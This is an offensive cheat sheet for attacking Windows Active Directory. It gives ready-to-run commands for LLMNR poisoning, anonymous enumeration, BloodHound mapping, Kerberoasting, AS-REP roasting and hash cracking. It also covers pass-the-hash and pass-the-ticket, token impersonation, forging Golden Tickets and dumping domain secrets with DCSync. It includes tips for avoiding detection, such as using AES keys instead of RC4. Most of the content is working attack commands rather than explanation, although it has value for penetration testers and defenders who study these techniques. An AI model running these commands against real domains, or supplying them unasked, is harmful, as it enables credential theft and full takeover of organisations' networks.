
Active Directory Attacks

Comprehensive guide to AD exploitation: BloodHound, Kerberoasting, AS-REP, and Lateral Movement


1. Initial Reconnaissance (No Credentials)

Before you have a single account, you can still harvest credentials off the wire and enumerate the domain anonymously.

  • LLMNR/NBT-NS Poisoning: Answer broadcast name lookups and capture NetNTLMv2 challenge-responses from hosts that fall for it. Crack them offline with hashcat -m 5600, or relay them with ntlmrelayx to hosts that do not require SMB signing.
    BASH
    sudo responder -I eth0 -dwv
  • SMB Null Session: Some DCs still allow anonymous binds, which gives you users, groups and shares without a password.
    BASH
    enum4linux -a <IP>
    crackmapexec smb <IP> -u '' -p '' --shares

2. Enumeration (With Credentials)

Once you have valid domain credentials (even a low-privilege user), map the domain before you attack it.

BloodHound (The Map)

  1. Ingestor: Run SharpHound on a domain-joined host, or bloodhound-python from the attacker box (-ns points it at a DC for DNS).
    POWERSHELL
    # On Victim
    .\SharpHound.exe -c All
    
    # On Attacker (if you have creds)
    bloodhound-python -u 'user' -p 'pass' -ns <DC_IP> -d domain.local -c All
  2. Analysis:
    • Find Shortest Path to Domain Admins.
    • Look for Kerberoastable Users.
    • Look for AS-REP Roasting opportunities.

PowerView (Manual)

POWERSHELL
Import-Module .\PowerView.ps1
# Get current domain
Get-NetDomain
# Find Domain Admins
Get-NetGroupMember -GroupName "Domain Admins"
# Find where DAs have sessions (walks every host; NetWkstaUserEnum needs local admin on the target, NetSessionEnum usually does not)
Invoke-UserHunter
# Find local admin access
Find-LocalAdminAccess

3. Kerberos Attacks

Kerberoasting

Any domain user can request a service ticket (TGS) for any account that has an SPN. The ticket is encrypted with that service account's key, so it can be brute-forced offline: if the service account has a weak password, you get it.

  1. Request (any domain user can do this; the TGS is encrypted with the service account's key):
    BASH
    # Impacket (write hashcat-format output straight to a file)
    GetUserSPNs.py domain.com/user:pass -dc-ip <DC_IP> -request -outputfile hashes.txt
    
    # Rubeus (On victim)
    .\Rubeus.exe kerberoast /outfile:hashes.txt
  2. Crack:
    BASH
    hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

AS-REP Roasting

Accounts with "Do not require Kerberos preauthentication" set will hand an AS-REP encrypted with their own key to anyone who asks, no password needed, so the encrypted part can be cracked offline just like a Kerberoast ticket.

  1. Check (without creds you need a user list; with creds, drop -usersfile and add -request so it finds the accounts itself):
    BASH
    # Impacket, no credentials
    GetNPUsers.py domain.com/ -usersfile users.txt -format hashcat -no-pass -outputfile hashes.txt
    # Impacket, with credentials
    GetNPUsers.py domain.com/user:pass -request -format hashcat -outputfile hashes.txt
  2. Crack:
    BASH
    hashcat -m 18200 hashes.txt rockyou.txt

4. Lateral Movement

Pass-the-Hash (PtH)

If you have an NTLM hash, you don't need the password: NTLM authentication proves knowledge of the hash, not of the password, so the hash itself is the credential.

BASH
crackmapexec smb <IP> -u Administrator -H <NTLM_HASH>
evil-winrm -i <IP> -u Administrator -H <NTLM_HASH>
# Impacket takes LMHASH:NTHASH; the LM half can be left empty
psexec.py domain/user@<IP> -hashes :<NTLM_HASH>

Pass-the-Ticket (PtT)

If you find a Kerberos ticket as a .kirbi (Rubeus/Mimikatz) or .ccache (Linux/Impacket) file, you can use it as-is. Impacket only reads .ccache, so convert a .kirbi first.

  1. Convert (if needed):
    BASH
    ticketConverter.py ticket.kirbi ticket.ccache
  2. Export: export KRB5CCNAME=/path/to/ticket.ccache
  3. Use: python3 psexec.py ... -k -no-pass (target the host by name, not IP, so Kerberos can match the SPN)

Over-Pass-the-Hash

Use the NTLM hash (or AES key) to request a real Kerberos TGT, then operate over Kerberos instead of NTLM. A TGT request using the RC4 key (/rc4) is commonly flagged as an encryption downgrade; prefer /aes256:<KEY> when you have the AES key.

POWERSHELL
.\Rubeus.exe asktgt /user:Administrator /domain:domain.local /rc4:<NTLM_HASH> /ptt

Token Impersonation (Incognito)

If you are local admin (SeImpersonatePrivilege/SeDebugPrivilege), you can steal the access tokens of other logged-in users, including domain accounts, and act as them without knowing any credential.

BASH
# Meterpreter
load incognito
list_tokens -u
impersonate_token "DOMAIN\\Administrator"

5. Domain Dominance

Golden Ticket

Forge a TGT for any account name, even one that does not exist, by signing it with the krbtgt key; the KDC trusts it without checking the account. ticketer.py's default lifetime is 10 years, which is itself a detection signal. Needs:

  1. The krbtgt account's NT hash (or its AES256 key), e.g. from DCSync.
  2. The domain SID (lookupsid.py, or strip the RID from any domain user's SID).
BASH
ticketer.py -nthash <krbtgt_hash> -domain-sid <SID> -domain domain.local administrator
export KRB5CCNAME=administrator.ccache
# Kerberos needs the target's hostname, not its IP, so the SPN resolves
psexec.py domain.local/administrator@<DC_HOSTNAME> -k -no-pass

DCSync (Secrets Dump)

Impersonate a Domain Controller and ask a real one to replicate account secrets over DRSUAPI. Needs: Domain/Enterprise Admin, or any account that holds both DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on the domain object (BloodHound shows this as a DCSync edge).

BASH
secretsdump.py domain/user:pass@<DC_IP> -just-dc
# NTLM hashes only (no Kerberos keys); a hash works as the credential too
secretsdump.py domain/user@<DC_IP> -hashes :<NTLM_HASH> -just-dc-ntlm